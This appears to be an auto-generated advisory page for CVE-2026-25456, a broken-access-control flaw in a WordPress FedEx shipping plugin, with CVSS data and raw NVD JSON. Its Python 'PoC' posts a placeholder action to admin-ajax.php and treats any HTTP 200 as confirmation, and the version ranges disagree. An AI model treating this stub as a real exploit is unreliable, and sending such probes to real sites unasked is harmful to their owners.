Security Vulnerability Report
中文
CVE-2026-25456 CVSS 7.3 HIGH

CVE-2026-25456

Published: 2026-03-25 17:16:52
Last Modified: 2026-04-28 02:16:08

Description

Missing Authorization vulnerability in Aarsiv Groups Automated FedEx live/manual rates with shipping labels a2z-fedex-shipping allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Automated FedEx live/manual rates with shipping labels: from n/a through <= 5.1.9.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Automated FedEx live/manual rates with shipping labels <= 5.1.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-25456: Missing Authorization in a2z-fedex-shipping # Target: WordPress Plugin "Automated FedEx live/manual rates with shipping labels" <= 5.1.9 target = "http://example.com" vulnerable_endpoint = "/wp-admin/admin-ajax.php" # Placeholder, actual endpoint may vary # Payload simulating the unauthorized access payload = { "action": "a2z_fedex_vulnerable_action" # Specific action parameter depends on plugin code } try: response = requests.post(target + vulnerable_endpoint, data=payload) if response.status_code == 200: print("[+] Potential vulnerability confirmed. Response:") print(response.text) else: print("[-] Request failed or target patched.") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25456", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:51.747", "lastModified": "2026-04-28T02:16:07.933", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Aarsiv Groups Automated FedEx live/manual rates with shipping labels a2z-fedex-shipping allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Automated FedEx live/manual rates with shipping labels: from n/a through <= 5.1.9."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Aarsiv Groups Automated FedEx live/manual rates with shipping labels a2z-fedex-shipping permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Automated FedEx live/manual rates with shipping labels: desde n/a hasta &lt;= 5.1.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/a2z-fedex-shipping/vulnerability/wordpress-automated-fedex-live-manual-rates-with-shipping-labels-plugin-5-1-8-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}